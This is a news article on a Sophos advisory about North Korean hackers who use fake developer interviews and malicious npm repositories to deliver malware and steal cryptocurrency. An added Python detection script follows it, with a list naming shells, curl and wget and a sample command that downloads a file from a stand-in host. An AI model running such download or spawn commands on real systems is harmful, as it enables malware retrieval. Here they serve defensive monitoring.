North Korean hackers are duping freelance developers with fake interviews to steal cryptocurrency and deliver malware — Sophos warns the 'Nickel Alley' group is using LinkedIn, Upwork, and Fiverr to target victims

A fake interview process uses coding tests and repo downloads to deliver malware

North Korean hackers are targeting software developers in a new malware campaign that uses a fake interview process to steal cryptocurrency.

The campaign targets developers, especially those in the finance and technology industries, with profiles on freelance websites such as Upwork or Fiverr. It offers well-paid job opportunities and targets specific, high-value individuals.

It relies on typosquatted or compromised legitimate npm repositories, which victims are persuaded to download and execute.

Researchers at the Sophos Counter Threat Unit have attributed the campaign to Nickel Alley, a threat group operating on behalf of the North Korean government.

"The group notoriously targets professionals in the technology sector by advertising fake job opportunities, deceiving prospective candidates through a fake job interview process, and ultimately delivering malware," the company said in an advisory.

As part of its attacks, Nickel Alley often creates a fake LinkedIn company page to build credibility, with a coordinating GitHub account for malware delivery.

The website homepage is generic and advertises 'tech talent' and managed service solutions. However, different domains are included on the LinkedIn company page and the GitHub account – which researchers noted shows inconsistency and lack of attention to detail.

Nickel Alley ramping up operations

The advisory from Sophos comes after a June 2025 X post warned of a campaign involving targeted emails promoting job opportunities at the fake Astra Byte Sync company.

The threat actors hadn't actually built the website at the time the emails were sent, meaning that the site simply displayed the hosting provider’s default page.

Over the last year, the group has used the popular ClickFix tactic to deliver PyLangGhost RAT malware via fake job skills assessment tasks.

This involved the attacker-controlled web interface presenting an error informing the victim that they must run a command locally to fix the issue – a command that instead initiated a series of actions leading to PyLangGhost RAT.

It previously used a GoLang-based version known as GoLangGhost RAT.

Meanwhile, in October, Sophos analysts uncovered a targeted attack where the threat actors convinced a victim to download, or clone, the content of a GitHub repository and execute the code locally using the 'npm install' and 'npm start' commands.

The GitHub account masquerades as a software development company specializing in full stack web development and blockchain solutions, and contains links to an 'official' company website and a fake LinkedIn company page.

While the main aim of these attacks appears to be cryptocurrency theft, Sophos said the threat group has also made it clear that it plans to use initial access for further supply chain compromise or corporate espionage.

"Additionally, the threat group has strategically selected follow-on payloads based on profiling victims’ system. Software developers, especially those in the finance and technology industries, are at elevated risk due to Nickel Alley’s targeting profile," Sophos warned.

"Organizations should monitor command execution and network traffic that spawns from Node.js processes, as it may indicate malware retrieval. As a general security practice, organizations should encourage employees to report suspicious unsolicited social media or email-based recruitment contact."

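The monitoring Sophos recommends can be sketched as a triage pass over endpoint telemetry that correlates what a Node.js process spawns with where it connects. This is an added example, not code from Sophos or this article; the event schema, the two tuning lists and every sample value are assumptions constructed for illustration.

```python
import json
from collections import defaultdict

# Assumed tuning lists: children a Node.js build rarely needs, and expected egress.
SUSPECT_CHILDREN = {"sh", "bash", "cmd.exe", "powershell.exe", "curl", "wget", "python3"}
EXPECTED_HOSTS = {"registry.npmjs.org"}

def exe_name(path):
    """Lower-cased file name from a POSIX or Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def is_node(path):
    return exe_name(path) in {"node", "node.exe"}

def triage(lines):
    """Group findings per Node.js PID. Severity is 'high' when the same PID both
    spawns a suspect child and connects outside the allowlist, else 'review'."""
    spawned, egress = defaultdict(list), defaultdict(list)
    for line in lines:
        ev = json.loads(line)
        if ev["type"] == "process" and is_node(ev["parent"]):
            if exe_name(ev["image"]) in SUSPECT_CHILDREN:
                spawned[ev["ppid"]].append(ev["cmd"])
        elif ev["type"] == "network" and is_node(ev["image"]):
            if ev["host"] not in EXPECTED_HOSTS:
                egress[ev["pid"]].append(ev["host"])
    report = {}
    for pid in sorted(set(spawned) | set(egress)):
        severity = "high" if pid in spawned and pid in egress else "review"
        report[pid] = {"severity": severity,
                       "commands": spawned.get(pid, []),
                       "hosts": egress.get(pid, [])}
    return report

# Constructed sample telemetry; the schema and every value are illustrative.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"type": "process", "pid": 401, "ppid": 400, "parent": "/usr/bin/node",
     "image": "/bin/sh", "cmd": "sh -c node-gyp rebuild"},
    {"type": "network", "pid": 400, "image": "/usr/bin/node", "host": "registry.npmjs.org"},
    {"type": "process", "pid": 501, "ppid": 500, "parent": r"C:\Program Files\nodejs\node.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c curl -O https://files.example.net/a"},
    {"type": "network", "pid": 500, "image": r"C:\Program Files\nodejs\node.exe",
     "host": "files.example.net"},
    {"type": "process", "pid": 601, "ppid": 600, "parent": "/usr/bin/python3",
     "image": "/bin/sh", "cmd": "sh -c make"},
]]

if __name__ == "__main__":
    for pid, finding in triage(SAMPLE_EVENTS).items():
        print(pid, finding)
```

Package install scripts legitimately start shells, so "review" findings are expected noise to tune against; the combination of a spawned command and unexpected egress from the same Node.js process is the signal worth escalating.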

Emma Woollacott

Emma Woollacott is a freelance journalist writing for publications including the BBC, Private Eye, Forbes, Raconteur and specialist technology titles.